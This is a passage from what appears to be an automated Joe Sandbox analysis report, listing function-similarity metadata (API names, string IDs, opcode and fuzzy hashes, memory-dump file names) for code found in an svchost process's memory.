                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                          • String ID: csm$csm
                                                                          • API String ID: 3896166516-3733052814
                                                                          • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction ID: 9177f0bf0d9df7804a9a46984ee0add15a62b848f9b6fecfe92ace9b6ae30fc5
                                                                          • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                          • Instruction Fuzzy Hash: 2B518F72140AC28AEB748BB59D843B977E0F354BE5F1CA265DA5947BD5CF38D860CB00
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction ID: afc53225cc655b2fed49d42925427f3b528b099016d9c220d28cc2c64652b1ec
                                                                          • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                          • Instruction Fuzzy Hash: 1D51AB32661A02CAFB18DB15E484BB93BE5F354BDCF518134DB1643B88EB78E841CB84
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 3242871069-629598281
                                                                          • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction ID: 5bb8fd39fd54a1bbbe4b45dd7fca3805f069a24c38516c4c1dc5b630a5076e57
                                                                          • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                          • Instruction Fuzzy Hash: C431BC72251B42D6F714DF12E884BA97BE8F740BC8F458124EF9A43B88DB38E941C784
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                                          • String ID:
                                                                          • API String ID: 2718003287-0
                                                                          • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction ID: c39e5784b660c4a4d2f64d18794380c2bf08d3c743fbeb2aeb89f9dd3d7ee852
                                                                          • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                          • Instruction Fuzzy Hash: E0D19A72B54E818AE711CBA9D4402FC7BF1F358BD8F1482A6DE5997B99DB34C506C340
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Free
                                                                          • String ID:
                                                                          • API String ID: 3168794593-0
                                                                          • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction ID: 6a44d1e2dfff894d57fae1d393df2fad9fd7c7e601c52ccba1ddab5a2a16cdc8
                                                                          • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                                          • Instruction Fuzzy Hash: 90014476640ED1DAE704EF66E9082AAA7E0F78CFC1F088435EA4A43729EF38C151C740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleErrorLastMode
                                                                          • String ID:
                                                                          • API String ID: 953036326-0
APIs
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
• String ID:
• API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Strings
Memory Dump Source
• Source File: 00000043.00000002.3294067605.000001F28C1D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C1D0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c1d0000_svchost.jbxd
Similarity
• API ID: __std_exception_copy
• String ID: Locator'$riptor at (
• API String ID: 592178966-4215709766
APIs
Memory Dump Source
• Source File: 00000043.00000002.3295131706.000001F28C930000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F28C930000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_67_2_1f28c930000_svchost.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0